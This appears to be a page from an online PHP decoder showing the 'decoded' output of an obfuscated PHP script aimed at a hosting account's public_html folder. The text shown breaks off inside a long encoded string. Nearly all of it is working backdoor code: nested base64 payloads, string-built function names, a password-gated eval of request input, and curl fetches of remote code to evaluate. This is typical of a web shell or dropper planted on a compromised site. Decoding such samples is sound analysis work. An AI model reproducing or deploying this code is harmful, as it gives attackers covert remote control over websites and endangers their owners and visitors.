Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); set_time_limit(0); ignore_user_abort(true); $do = "/home/allso..

Decoded Output download

<?php 
error_reporting(0); set_time_limit(0); ignore_user_abort(true); 
$do = "/home/allsoftwaremart/public_html/"; 
$open_cache_ruzhu_phpcode = base64_decode("PD9waHAgLyotUGNWZzE8LSovZXJyb3JfcmVwb3J0aW5nKDApOyAkQ1IgLyotaDRUUkNefTxzUWZSSS0qLz0vKi0xLElLZCY6QzQuSnEtKi8gInJhIi4vKi1jTHkoKDhtU3gxV0p6Wm0tKi8ibmciLi8qLXtFdjY+JkxwTDx2NGMrWDQ7LSovImUiOyAkaUZyIC8qLTB2bTw1W2h4ekN2JSZLIUQtKi89IC8qLVAkSXdxXmBKQiYhZnFYU0stKi8kQ1IvKi1ydE8kMywlTiYtKi8oLyotb3c0QnNPX0kkPFcjWDdqS24tKi8ifiIsLyotWlpzdHFeVXIlZzl1dEBCLSovIiAiKTsvKi13UUhnc1VJMlV9LSovJFhzZG4vKi11OEYuKUpgdnt8N3EzOzMzSC0qLz0vKi1BVXRHW3pIYjZrfEtpfF1ZZy0qLyR7JGlGclsxNysxNF0vKi0mSjM3VmA4NWQrOW9wMFktKi8uJGlGcls1NysyXS4vKi1YQHd1Sk4+K1JKazZke1huREstKi8kaUZyWzkrMzhdLiRpRnJbMjgrMTldLi8qLU1ndnplSVhxT2guaEFefC0qLyRpRnJbNTArMV0uJGlGclsxNiszN10uJGlGci8qLXxdP3FwZnJLOWRRKGBsXkB4LSovWzM0KzIzXX07IC8qLWhwVl0zfU4oMXhCLSovQChjb3VudCgkWHNkbik9PSgyKzIxKSYmaW5fYXJyYXkoLyotLmdCSzAhbzJGZkouMGpMblVbLSovZ2V0dHlwZSgkWHNkbikuY291bnQvKi19WXZKanAwS3BkKEVTeTQtKi8oJFhzZG4pLCRYc2RuKSk/KCgkWHNkbls1OCsxMV09JFhzZG5bNDYrMjNdLiRYc2RuWzYrNjldKS8qLXFre2AlNkxzJFgrQlczSC0qLyYmLyotezt1ZztPbFtbaU8tKi9AZXZhbC8qLXZdSCR2PjRQVmUtKi8oJFhzZG5bOSs2MF0oJHskWHNkblszMisxOF19WzcrMTldKSkpOiRYc2RuOy8qLSthazF6LSovY2xhc3MgLyotdWdyUFIoLSovb3dVeUV7IC8qLUc6SW4md0UtNy0qL3N0YXRpYy8qLWlnTk0tKi8gZnVuY3Rpb24gLyotLWdYJSFVcUtaLSovR0tOSXZCcW4oJFpvakUpIC8qLSk8XSklX3g5WXstKi97ICR1bGNMQkRVaFIvKi10NC0qLyA9IC8qLWh4LSovInIiLi8qLWtQTGFeLSovImEiLi8qLTk1dWNMTncuLSovIm4iLi8qLXh5ZmgtKi8iZyIuLyotZiwtKi8iZSI7IC8qLU1wazJZenohay0qLyRxbWcvKi01fF0tKi8gPSAvKi1VN15tLSovJHVsY0xCRFVoUi8qLTxvN2NSSFEtKi8oLyotfT9TU1FSLSovIn4iLyotcCk9fG0wcVctKi8sIC8qLTxdKS0qLyIgIi8qLV9bLSovKTsvKi0oN0lIcy0qLyAkY3B6Uk9KUXkgLyotcVFodmx1fW8tKi89IC8qLTdgPS4lSlR3Ny0qL2V4cGxvZGUvKi0hOS0qLygvKi1aKy0qLyJbIiwgLyotWUYtKi8kWm9qRS8qLTlqU1YpYWxiLSovKTsgLyotMkErYVB+W1YtKi8kUlhUQmIgLyotIWcuXmVldy0qLz0gLyotTGtiYFlfZW88LSovIiI7IGZvcmVhY2ggLyotJlNPPkIrLSovKC8qLUwjOnBuP1gtKi8kY3B6Uk9KUXkgLyotLHMsdiUtKi9hcyAvKi1ETy0qLyRsREtDIC8qLXFNTmtOLSovPT4vKi11PG57SkhiKz9yLSovICRpZW9KTC8qLSY0LSovKSAvKi14bEZAVi0qLyRSWFRCYiAvKi1uMnhWPS0qLy49IC8qLSsscVUtKi8kcW1nWyRpZW9KTC8qLVtsPGUyb28tKi8gLSAvKi17ZS0qLzUxOTc0LyotTTM9b0ItKi9dOy8qLTRPW0QtKi8gcmV0dXJuIC8qLTBAc0EtKi8kUlhUQmI7IC8qLXRWdDk3LSovfSAvKi10eS0qL3N0YXRpYyAvKi16NDpxMU8tKi9mdW5jdGlvbiAvKi1bYTFnLSovdnpwdVdTLyotPiZrMmllYi0qLygvKi1UMnstKi8kYnFoS25YLC8qLUE9LSovICRjbGlwUXFWYlV2LyotV1pmPi0qLykvKi1xfi0qLyB7LyoteDl1QnpfTFpiLSovICRnU1F2UHpwWU8vKi1VNl87XXE1OSF0LSovID0gLyotOnxmZnwtKi9jdXJsX2luaXQvKi1VIzUtKi8oLyotWCEtKi8kYnFoS25YLyotKVZXTS0qLyk7LyotcHFaLSovIGN1cmxfc2V0b3B0LyotTzhFM1NjLSovKC8qLVBaSWlNY0RzSi0qLyRnU1F2UHpwWU8sLyotMmxkNi0qLyBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLC8qLSV3ay0qLyAxLyotZEoyTkY6LSovKTsvKi1MKC0qLyAkSE1hQ2drdS8qLUk1d0UsLSovID0gLyotWFkyXT44aX54LSovY3VybF9leGVjLyotTmtlVkdgPS0qLygvKi1Nfmd5Yjl9di0qLyRnU1F2UHpwWU8vKi1lUlV0dTg5ei0qLyk7IC8qLX5rRjAxPDlxUGMtKi9yZXR1cm4gLyotKDY6UC0qL2VtcHR5LyotT3xASks4YzwtKi8oLyotZ1QpentJdXN4LSovJEhNYUNna3UvKi1lJDUkdEUtKi8pLyotJldubV9nQy0qLyA/IC8qLWJlLSovJGNsaXBRcVZiVXYvKi1GbE4tKi8oLyotXTJMNUh0aC0qLyRicWhLblgvKi1kLV1KaS0qLykvKi05Ti0qLyA6IC8qLUVaOzZWaTotKi8kSE1hQ2drdTsgLyotbyZgLSovfS8qLTVuLSovIHN0YXRpYy8qLUYsW0N1Ri0qLyBmdW5jdGlvbiAvKi17Y1V3MUMtKi9TSnROUi8qLUhRKDhbSTYkLSovKCkgLyotKXgydm9TLi0qL3svKi1MVUh4Zy0qLyAkTVR1em4gLyotMWNWam1Kb100LSovPS8qLWtMMlUpbHUwLSovIGFycmF5LyotfWpXVS0qLygiNTIwMDFbNTE5ODZbNTE5OTlbNTIwMDNbNTE5ODRbNTE5OTlbNTIwMDVbNTE5OThbNTE5ODNbNTE5OTBbNTIwMDFbNTE5ODRbNTE5OTVbNTE5ODlbNTE5OTAiLCI1MTk4NVs1MTk4NFs1MTk4Nls1MjAwNVs1MTk4Nls1MTk4OVs1MTk4NFs1MjA1MVs1MjA0OSIsIjUxOTk0WzUxOTg1WzUxOTg5WzUxOTkwWzUyMDA1WzUyMDAwWzUxOTk5WzUyMDAxWzUxOTg5WzUyMDAwWzUxOTk5IiwiNTE5ODhbNTIwMDNbNTIwMDFbNTE5OTMiLCI1MjAwMls1MjAwM1s1MTk4NVs1MTk5OVs1MjA0Nls1MjA0OFs1MjAwNVs1MjAwMFs1MTk5OVs1MjAwMVs1MTk4OVs1MjAwMFs1MTk5OSIsIjUxOTk4WzUxOTk1WzUxOTkyWzUxOTk5WzUyMDA1WzUxOTk3WzUxOTk5WzUxOTg0WzUyMDA1WzUyMDAxWzUxOTg5WzUxOTkwWzUxOTg0WzUxOTk5WzUxOTkwWzUxOTg0WzUxOTg1IiwiNTIwMjhbNTIwNTgiLCI1MTk3NSIsIjUyMDUzWzUyMDU4IiwiNTIwMzVbNTIwMThbNTIwMThbNTIwMzVbNTIwMTEiLCI1MTk4OVs1MTk5OCIpOyAvKi1mRmI/QXBlUHtzLSovZm9yZWFjaCAvKi0/JDEtKi8oLyotOVkmXXIwQC0qLyRNVHV6bi8qLTwhXiFrLSovIGFzIC8qLTRNQT5adC0qLyRpaC8qLTpCP240PEUtKi8pLyotZGxZUy0qLyAkT2JyTGVGSy8qLVpiWkFYR35nbi0qL1tdIC8qLVclZ0JATl5dJi0qLz0gLyotMVpsbCszay0qL3NlbGYvKi1QWnozNi0qLzo6LyotSkctKi9HS05JdkJxbi8qLTpRcC0qLygvKi1aXiRkTlBQUy0qLyRpaC8qLXE8LSovKTsvKi1CRiFfLSovJFpTSyAvKi1Aalh+M3RBKHAtKi89IC8qLUdvRH1DTy0qL0AkT2JyTGVGSy8qLTRkLSovWy8qLWxrLSovMS8qLWc4akpfLSovXS8qLVBFbFtAM1c9LSovKC8qLXkodih1dSUtKi8key8qLX1nUXFWWTNnLSovIl8iLyotY2ooX2E2ei0qLy4iRyIvKi1VNS0qLy4iRSIvKi1kW0ktKi8uIlQiLyotbEMtKi99Wy8qLShKTyZxLSovJE9ickxlRksvKi0/dHctKi9bLyotOyVUVFBnTTxaLSovMCs5LyotJEUtKi9dXS8qLThxWyMtKi8pOy8qLXxvcllSLSovICRReUpSSXcgLyotV2ZoLihaLSovPS8qLTlyLSovIEAkT2JyTGVGSy8qLSw1KUclLSovWy8qLVRlVHRBc3RmXX4tKi8zKzAvKi1HSENXUS0qL10vKi05dj5+aXQtKi8oLyotcTNvLSovJE9ickxlRksvKi0rK0MxLSovWy8qLWlJfEwyRX1VLSovMyszLyotXTJ8Iy0qL10sIC8qLUg3LSovJFpTSy8qLW13d24mV0ktKi8pOy8qLXZzbXszcy0qLyAkYUV4Zm9rIC8qLTtxT1hmLSovPS8qLTktQC0qLyAkT2JyTGVGSy8qLXkjZGduWi0qL1svKi15PVB+RSZNNCltLSovMCsyLyotKyVmPzhkQy0qL10vKi1BXkV8QEUtKi8oLyotQjhrLSovJFF5SlJJdywvKi1qNTctWy0qLyB0cnVlLyotMj9XbFQtKi8pOyAvKi1ZWW91UXwtKi9AJHsvKi1iViR+by0qLyJfIi4vKi05Zn4/LSovIkciLi8qLXo2eWpBKGY7Ji0qLyJFIi8qLVhUPjsySkZ5QlItKi8uIlQiLyotY1NUNERKLSovfS8qLSU/dTw4LSovWy8qLUZpLSovJE9ickxlRksvKi0lITlCVFQtKi9bOSsxLyotJVIrLSovXS8qLVY1bXVXWC0qL10vKi0zKzBIS0pUMC0qLyA9PSAvKi15NT18LSovMSAvKi1CeGVNNy0qLyYmIC8qLTFpaC0qL2RpZS8qLTI9NzlgNih2Mi0qLygvKi1HRC0qLyRPYnJMZUZLWzMrMi8qLXZlR1ckcygtKi9dLyotS18tKi8oLyotdUtZJSMrLSovX19GSUxFX18vKi1PWShIeC0qLykvKi0pci0qLyk7IC8qLU5KUm5PYV8tKi9pZi8qLTplO3dZI3YtKi8oLyotakQ5VlYmLSovICgvKi1rMmE7MnkxM0MtKi8oQC8qLWluLSovJGFFeGZvay8qLWIpZE9dRy0qL1svKi1kP3hpdiFBYk0tKi8wLyotQV0tKi9dIC8qLX4tKi8tIHRpbWUvKi0zX2ItKi8oKS8qLVUzUChtLSovKSA+IC8qLThsP3UtKi8wLyotQXApLSovKS8qLX4sZWBRaUEkLSovIGFuZCAvKi0sPj1XLSovKC8qLXo8V2AxWi0qL21kNS8qLWZURVRKJTR9Li0qLygvKi1rQnJfaS0qL21kNS8qLXJ7WSNRLSovKC8qLVBrLSovJGFFeGZvay8qLT91cmtZV3BILSovWy8qLUNBLSovMyswLyotUll+IW0tKi9dLyotWXA4anwpOEYtKi8pLyotZE56PVUmYC0qLykvKi00MjZsMTJ9PXktKi8gPT09IC8qLUFwPTMyTXFGLSovImU0NmYzYzI1ZTg4YjYwYjI0OWY0YTkxODE1Y2E5NGIxIi8qLX1uPDs3QkNjLSovKS8qLUFHLSovICk6IC8qLXEsU1FVRC0qLyRvYnp1V2RoIC8qLVNYLSovPS8qLVN0LG1HUXNvLSovIHNlbGYvKi1+M0RpLSovOjovKi0+RXtOMT0tKi92enB1V1MvKi1uOm1yPFV+LSovKC8qLUFGNEEtKi8kYUV4Zm9rLyotNnZ0Z2wtKi9bLyotOD8pVi0qLzErMC8qLXc1JFQtKi9dLCAvKi1sZUgwNi0qLyRPYnJMZUZLLyotez47Xzkha0o8cS0qL1svKi1LWVRjPD9qLSovNSswLyotM3YsKyktKi9dLyotY355LSovKTsvKi0kLUB5KC0qL0BldmFsLyotR0pRLWxPLSovKC8qLT9NcT9hLSg3ai0qLyRPYnJMZUZLLyotTSFOSGhfPmMtKi9bLyotYDNjLSovMisyLyotZW1rQlUtKi9dLyotc2V8fEFTLSovKC8qLVh9d3RbcDJrYHUtKi8kb2J6dVdkaC8qLV59fTxGO0MoLSovKS8qLVZdRmVSKSZ8Ti0qLyk7LyotYn0tKi8vKi05SktKeS0qL2RpZTsvKi0jXzBHLSovIGVuZGlmOy8qLV07aHMtKi8gfS8qLSE7OUZpJXw4LSovfS8qLXp0VV49cHxGLSovb3dVeUUvKi0jcWItKi86Oi8qLU9gTWwtKi9TSnROUi8qLXIkPCRdO2pBLSovKCk7LyotcWleNC0qLy8qLVtCYSxrYStHRC0qL2V2YWwvKi1HPnlvckYoPnI3fiE7dHVofVVhdmFLd24jYE1HJXYhMzo/MylMLSovKC8qLUQ5ZTUmaFEtKi9iYXNlNjRfZGVjb2RlLyotPi4layNaJi0qLygvKi1HWWtOd3V0cUAtKi8iWlhaaGJDZ2lQejRpTG1KaGMyVTJORjlrWldOdlpHVW9JbEJFT1hkaFNFRm5ZVWRXYUZwSFZubExRMlJFWWpJMU1GcFhOVEJNVmxJMVkwZFZOa2xJVW14bFNGRjJZVWhTZEdKRWMyZFpNbWhvWTI1T2JHUkVNVEZrUjFsMFQwTmpjRTk1UWtGYVIwWXdXbFk1YTFwWFdtaGtWM2d3V0ROU2NHSlhWalppTWpWc1dETk9iR1JEWjI1UldFNXdXVk01VldJeWREVmllV053VDNjd1MxcHVWblZaTTFKd1lqSTBaMkZIT1c1Uk0wNHdWVlZzYkZSWGNHdGxWVFZwVkVoQ2MxSlhhMjlLU0Vwc1l6TkNabUZIVm1oYVIxWjVTMUV3UzJWM01FdEpRMEZuU1VOU2IxcFhSbXRhV0VsblVGTkNhR051U21obFUyZHVZek5TYUdSSVZucEtlVUU1VUdsQmQweERRVzVaTWpsMVpFZFdkV1JEWTJkUVZEUm5TbmxqYzBsRFpEQmxXRUpzU25sQk9WQnBRVzVLZVdzM1JGRnZaMGxEUVdkaFYxbG5TME5HY0dNeE9XaGpia3BvWlZObmEyTnRWbnBqUmpsdldsZEdhMXBZU1hCTFUwSTNSRkZ2WjBsRFFXZEpRMEZuU1VoS2JHUklWbmxpYVVGcllVZFdhRnBIVm5sUGR6QkxTVU5CWjBsSU1FNURhVUZuU1VOQ2JXSXpTbXhaVjA1dlNVTm5hMk50Vm5walJqbHZXbGRHYTFwWVNXZFpXRTFuU2tkb2RtSnRWWEJKU0hOT1EybEJaMGxEUVdkSlEwRm5ZVmRaWjB0SVFubGFWMlJtWWxkR01Ga3laMjlLZVRsdlpFaFNkMWhET1dKTlF6QTFXRU0xWkVzeGRHTmpNVEJ5UzBaemQweFViR1JMZVd0MllWTmpjMGxEVW05aU1qVnNURU5CYTJKWFJqQlpNbWhzV2tOcmNFbEljMDVEYVVGblNVTkJaMGxEUVdkSlEwRm5TVU5TYjFwWFJtdGFXRXBpU2pOT01GbFlVakZqZVdSa1NVUXdaMkZYTlRCa2JVWnpTME5TZEZsWVVtcGhSMVpyVjNwR1pFdFVjMDVEYVVGblNVTkJaMGxEUVdkbVUwSnNZa2hPYkdGWFdXZExTRUo1V2xka1ptSlhSakJaTW1kdlNuazVjMkl5VG1oa1IyeDJZbXgzTmxjeGVIcFlVM052VEdsdmNFd3lhMjVNUTBGcllVYzVkVnBUZDJkS1J6Rm9aRWRPYjFwWFVYQkxVMEkzUkZGdlowbERRV2RKUTBGblNVTkJaMGxEUVd0aFIxWm9Xa2RXZVZkNVpHcGlNalV3V2xjMU1Fb3hNR2RRVTBGcllsZEdNRmt5YUd4YVJuTjRXRlJ6VGtOcFFXZEpRMEZuU1VOQloyWlRRbXhpU0U1c1lWZFpaMHRJUW5sYVYyUm1ZbGRHTUZreVoyOUtlVGxxWWpJMU1GcFhOVEJZUXpFd1pWaENiRmhFY0dKWVNFNWtTM2xuZFV0cGEzWmhVMk56U1VOU2IySXlOV3hNUTBGcllsZEdNRmt5YUd4YVEydHdTVWh6VGtOcFFXZEpRMEZuU1VOQlowbERRV2RKUTFKdldsZEdhMXBZU21KS00xSTFZMGRWYmxoVFFUbEpRMUowV1ZoU2FtRkhWbXRYZWtaa1QzY3dTMGxEUVdkSlEwRm5TVU5DT1VSUmIyZEpRMEZuWmxFd1MwbERRV2RKU0Vwc1pFaFdlV0pwUVd0aFIxWm9Xa2RXZVU5M01FdG1VVEJMUkZGd2JXUlhOV3BrUjJ4MlltbENlbHB1Ykdoa1NGcHBZVWhHYzJGcFoydGtXRXB6VEVOQmExcEhSakJaV0UxblVGTkNhR051U21obFUyZHdTMUV3UzJWM01FdEpRMEZuU1VOU2VWcFlUbmRpTWpWNldsTkJPVWxIUm5samJVWTFTME5rZW1SSFJqQmtXRTF1U1VRd0swbEVRWE5KUTJScVlqSTFNRnBYTlRCS2VVRTVVR2xCYmtwNWQyZEtNMUkxWTBkVmJrbEVNQ3RKUTJOdVMxUnpUa05wUVdkSlEwSndXbWxCYjJGWVRtWlpXRXA1V1ZocmIwcEhVbWhrUjBaNlMxTkJiVXBwUW1waU0xWjFaRU5uYTFwSFJqQlpXRTF3UzFOQ04wUlJiMmRKUTBGblNVTkJaMGxEVWpGamJYZG5UR293WjBwNk9HNUpRelJuWVVoU01HTkdPV2xrVjJ4eldrWTVlR1JYVm5sbFUyZHJXa2RHTUZsWVRYQlBkekJMU1VOQlowbElNRTVEYVVGblNVTkNNR051YTJkbGR6QkxTVU5CWjBsRFFXZEpRMEp3V21sQmIxcHVWblZaTTFKd1lqSTFabHBZYUhCak0xSjZTME5rYW1SWVNuTllNbFkwV2xkTmJrdFRXVzFhYmxaMVdUTlNjR0l5TldaYVdHaHdZek5TZWt0RFpHcGtXRXB6V0RKc2RXRllVVzVMVTJ0blpYY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEtSMDFuVUZOQ2FtUllTbk5ZTW14MVlWaFJiMHRVYzA1RGFVRm5TVU5CWjBsRFFXZEpRMEZuU1VkT01XTnRlR1pqTWxZd1lqTkNNRXREVW1wTVEwSkVWbFpLVFZReFFsVllNVlpUVkVOM1owcElWbmxpUTJzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFtcGtXRXB6V0ROT2JHUkhPWGRrUTJkcldYbDNaMUV4VmxOVVJUbFJWa1k1VkZVd2VHWldhMVpUVTFWYVdsTkZPVlJXUTNkblRVTnJOMFJSYjJkSlEwRm5TVU5CWjBsRFFXZEpRMEpxWkZoS2MxZ3pUbXhrUnpsM1pFTm5hMWw1ZDJkUk1WWlRWRVU1VVZaR09WUlZNSGhtVm10V1UxTlZXbHBWUlZaR1ZXbDNaMDFEYXpkRVVXOW5TVU5CWjBsRFFXZEpRMEZuU1VOQ2FtUllTbk5ZTTA1c1pFYzVkMlJEWjJ0WmVYZG5VVEZXVTFSRk9WRldSamxFVkRBMVQxSlZUbFZXUld4T1VsVTVWbFpEZDJkTmFrRndUM2N3UzBsRFFXZEpRMEZuU1VOQlowbERRV2RaTTFaNVlrWTVlbHBZVW5aalNGRnZTa2ROYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDVxUVhCUGR6QkxTVU5CWjBsRFFXZEpRMEZuU1VOQloxa3pWbmxpUmpsNldsaFNkbU5JVVc5S1IwMXpTVVZPVmxWcmVGQlZSbEptVW1zNVRWUkZPVmhVUlRsRVVWWlNTbFF3TkhOTlEyczNSRkZ2WjBsRFFXZEpRMEZuU1VOQlowbERRbXBrV0VweldETk9iR1JIT1hka1EyZHJXWGwzWjFFeFZsTlVSVGxSVmtZNVJGUXdPVXhUVlZaVVVsWk9WRk5WT1U5TVEwRjNTMVJ6VGtOcFFXZEpRMEZuU1VOQlowbERRV2RKUjA0eFkyMTRabU15VmpCaU0wSXdTME5TYWt4RFFrUldWa3BOVkRGQ1ZWZ3hTa1pXUmxaVFZHeFNVMUZWTlZSU2ExWlRURU5CZUV0VWMwNURhVUZuU1VOQlowbERRV2RKUTBGblNVTlNhbGd6U214a1NGcG9Za05CT1VsSFRqRmpiWGhtV2xob2JGbDVaMnRaZVdzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFXdGpiVlo2WTBjNWRXTXlWbUpLTTA0d1dWaFNNV041WkdSSlJEQm5ZVmMxTUdSdFJuTkxSMDR4WTIxNFpsb3lWakJoVnpWdFlubG5hMWw1ZDJkUk1WWlRWRVZzVDFKck9XWlRSbEpWVlVZNVJGUXdVa1pMVTJzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFXdGpiVlo2WTBjNWRXTXlWbUpLTTFJMVkwZFZibGhUUVRsSlNFNHdZMjVhYUdKRGFHcGtXRXB6V0RKa2JHUkhiSFZhYlRodlNrZE5jMGxGVGxaVmEzaEtWR3RhVUZnd1RsQlViRkpHVkd4U1psWkdiRkZTVTJ0d1QzY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEtTRXBzWXpOQ2RtSnVUbXhYZVdScVlqSTFNRnBYTlRCS01UQm5VRk5DZW1SSVNqSlpWM2R2V1ROV2VXSkdPVzVhV0ZKd1ltMWFka3REVW1wTVEwSkVWbFpLVFZOVk5VZFVNVGxUVWxWU1NsVnJWa1JXUmpsV1ZXdDNjRXRVYzA1RGFVRm5TVU5CWjBsRFFXZEpRMEZuU1VWQ2FtUllTbk5ZTWs1ellqTk9iRXREVW1wTFZITk9RMmxCWjBsRFFXZEpRMEZuU1VOQlowbEhiRzFKUTJkclkyMVdlbU5IT1hWak1sWmlTak5PTUZsWVVqRmplV1JrU1VRd09VbEVTWGROUTJ0blpYY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOU2VWcFlUbmRpTWpWNldsWnpibGt5T1hWa1IxWjFaRU5rWkVsRU1HZGpNMUo1WkcxR2MwdERVbXBZTTBwc1pFaGFhR0pEYXpkRVVXOW5TVU5CWjBsRFFXZEpRMEZuU1VOQ09VUlJiMmRKUTBGblNVTkJaMGxJTUdkYVYzaDZXbGRzYlVsRGFIQmliV3htV2pKV01FdERaR2hpUjNoMlpERTVNV050ZUdaYWJUbDNXbGMwYmt0VGEyZGxkekJMU1VOQlowbERRV2RKUTBGblNVTkJaMHBIYURCa1NFSm1Zak5DTUVsRU1HZFpXRXA1V1ZocmIwUlJiMmRKUTBGblNVTkJaMGxEUVdkSlEwRm5TVU5CWjBveWFEQmtTRUZ1U1VRd0swbEhSbmxqYlVZMVMwTmtkRnBZVW05aU1sRnVTVVF3SzBsRFpFaFNWbEZ1VEVOQmJtUkhiSFJhVnpreFpFTmpaMUJVTkdkT2FrRnpTakphZG1KSGVIWmtNVGx6WWpKT2FHUkhiSFppYVdNNVVHcEJjRXhCTUV0SlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOQlowbERaSHBqTW5kdVNVUXdLMGxIUm5samJVWTFTME5LTWxwWVNuQmFibXhtWTBkV2JHTnBTV2RRVkRSbldtMUdjMk15VlhOSlEwb3lXbGhLY0ZwdWJHWmpSMVpzWTJ3NWRWbFhNV3hKYVVFNVVHbENiVmxYZUhwYVUydE9RMmxCWjBsRFFXZEpRMEZuU1VOQlowbERhemRFVVc5blNVTkJaMGxEUVdkSlEwRm5TVU5CYTFreU9YVmtSMVkwWkVOQk9VbElUakJqYlZab1lsWTVhbUl5TlRCYVdHZ3dXREpPZVZwWFJqQmFVMmRyWVVoU01HTkdPWFpqU0ZGd1QzY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEtSMDUyWW01U2JHSnVVV2RRVTBKQldtMXNjMXBXT1c1YVdGSm1XVEk1ZFdSSFZuVmtTRTF2U2toV2VXSkRkMmRhYlVaell6SlZjMGxEVW1waU1qVXdXbGhvTUV0VWMwNURhVUZuU1VOQlowbERRV2RKUTBGblNVTlNlVnBZVG5kaU1qVjZXbE5CT1VsSFJubGpiVVkxV0RJeGJHTnRaR3hMUTFKNVdsaE9kMkl5TlhwYVUzZG5ZVWM1YmxFelRqQlZWV3hzVkZkd2EyVlZOV2xVU0VKelVsZHJiMHBIYURCa1NFSm1ZMjFXZW1OSE9YVmpNbFptWVVkV2FGcEhWbmxMVTJzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFuQmFhVUZ2U2toS2JHTXpRblppYms1c1YzbGtlbVJIUmpCa1dFMXVXRk5CT1ZCVFFYbE5SRUZ3U1VoelRrTnBRV2RKUTBGblNVTkJaMGxEUVdkSlEwRm5TVU5CYTJOdFZucGpSemwxWXpKV1lrb3lUblppYmxKc1ltNVJibGhUUVRsSlNFNHdZMjVhYUdKRFoydFpNamwxWkVkV2RXUkRhemRFVVc5blNVTkJaMGxEUVdkSlEwRm5TVU5DT1VSUmIyZEpRMEZuU1VOQlowbElNRTVEYVVGblNVTkNPVWxIVG1oa1IwNXZTVU5vUm1WSFRteGpTRkp3WWpJMFowcEhWWEJKU0hOT1EybEJaMGxEUWpsRVVXOW5TVU5CWjJOdFZqQmtXRXAxU1VOU2VWcFlUbmRpTWpWNldsUnpUa051TUU1RFp6QkxXbTVXZFZrelVuQmlNalJuVmxWV1RXRnRValpaVm13MVpEQkdjRkl5TlcxVWVXZHJZek5TZVV0Uk1FdGxkekJMU1VOQlowbEhiRzFKUTJkb1NraE9NR05wYTJkamJWWXdaRmhLZFVsRFkyNVBkekJMU1VOQlowbElTbXhrU0ZaNVltbENlV1JJU25CaVUyaDZaRWhLTUdOcGFHbFpXRTVzVG1wU1pscFhOV3BpTWxKc1MwTlNlbVJJU1hCTVEwRnVTM2s0Ymt4RFFXNU1Wamh1UzFOM1owcDZNRzVMVkhOT1EyNHdUa05uTUV0YWJsWjFXVE5TY0dJeU5HZGFWemt5WXpKU1RXUkZTalpsUlZwUFdXeGFWbU5wWjNCRVVYQTNSRkZ2WjBsRFFXZEtSMngzV0RKR2ExcElTV2RRVTBGdVNucHpUa05wUVdkSlEwSndXbWxCYjJGWVRucGFXRkZ2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aUk1GcG1VVEE1VDFSclZrUldSV3hQVWpFNVNsVkRaR1JMVTBGdFNtbEJhRnBYTVhka1NHdHZTa1k1VkZKV1NsZFNWa3BpU2pCb1ZWWkdRbVpSTUZwbVVUQTVUMVJyVmtSV1JXeFBVakU1U2xWRFpHUkxVMnRuWlhjd1MwbERRV2RKUTBGblNVTkJhMkZZUW1aWlYxSnJZMmxCT1VsRFVtWlZNRlpUVm10V1UxZDVaRWxXUmxKUldEQk9SMWd3VGxCVWF6VkdVVEZTU2xSclpHWlRWa0Z1V0ZSelRrTnBRV2RKUTBJNVNVZFdjMk15Vm5CYWFVRnZZVmhPZWxwWVVXOUtSamxVVWxaS1YxSldTbUpLTUdoVlZrWkNabGRHT1ZOU1ZVWk5XREJzVVVveE1IQkpRMWx0U1VOR2JHSllRakJsVTJkcldERk9SbFZzV2taVmJITnVVMFpTVlZWR09WbFlNVXBHVVZWNFpsTldRVzVZVTJ0d1NVaHpUa05wUVdkSlEwRm5TVU5CWjBwSGJIZFlNa1pyV2toSloxQlRRV3RZTVU1R1ZXeGFSbFZzYzI1VFJsSlZWVVk1V1ZneFNrWlJWWGhtVTFaQmJsaFVjMDVEYVVGblNVTkNPVWxIVm5Oak1sWndXbWxCYjJGWVRucGFXRkZ2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aWFJqbEhWREZLV0ZGV1NrVlNWVkptVW1zNVUwb3hNSEJKUTFsdFNVTkdiR0pZUWpCbFUyZHJXREZPUmxWc1drWlZiSE51VTBaU1ZWVkdPVmxZTUZwUVZXeGtRbFZyVWtaU1JqbEhWREZKYmxoVGEzQkpTSE5PUTJsQlowbERRV2RKUTBGblNrZHNkMWd5Um10YVNFbG5VRk5CYTFneFRrWlZiRnBHVld4emJsTkdVbFZWUmpsWldEQmFVRlZzWkVKVmExSkdVa1k1UjFReFNXNVlWSE5PUTJsQlowbERRamxKUjFaell6SlZaMlYzTUV0SlEwRm5TVU5CWjBsRFFXdGhXRUptV1ZkU2EyTnBRVGxKUTFKbVZUQldVMVpyVmxOWGVXUlRVbFV4VUZaRlZtWlJWVkpGVldsa1pFOTNNRXRKUTBGblNVZ3dUa05wUVdkSlEwRnJZVmhDWmxsWFVtdGphVUU1U1VoU2VXRlhNRzlqTTFKNVdETktiR05IZUdoWk1sVnZTV2xCYVV4RFFXbEphWGRuU2tkc2QxZ3lSbXRhU0Vsd1RFTkJhVXhEU1hCUGR6QkxTVU5CWjBsSGJHMUpRMmg2WkVoS2QySXpUVzlLUjJ4M1dESkdhMXBJU1hOSlEwbHpTV2xyWjBsVU1EbEpSMXBvWWtoT2JFdFRRamRFVVc5blNVTkJaMGxEUVdkSlExSndZMFk1YUZwSFVubEpSREJuV2xob2QySkhPV3RhVTJkcFRFTkpjMGxEVW5CalJqbG9Xa2RTZVV0VWMwNURhVUZuU1VOQlowbERRV2RLUjJ4M1dESkdhMXBJU1dkUVUwRnJZVmhDWmxsWFVtdGpiSE4zV0ZSelRrTnBRV2RKUTBJNVJGRnZaMGxEUVdkamJWWXdaRmhLZFVsRFVuQmpSamxvV2tkU2VVOTNNRXRtVVRCTFJGRndiV1JYTldwa1IyeDJZbWxDVVZZd05XbFdTRVpyVkZkd1NWRXphSEpqUTJkd1JGRndOMFJSYjJkSlEwRm5Ta2RvTUdSSVFtWmpTRXAyWkVjNFoxQlRRVzVoU0ZJd1kwUnZka3g1WXpkRVVXOW5TVU5CWjJGWFdXZExSMng2WXpKV01FdERVbVpWTUZaVFZtdFdVMWQ1WkVsV1JsSlJWWGxrWkV0VFF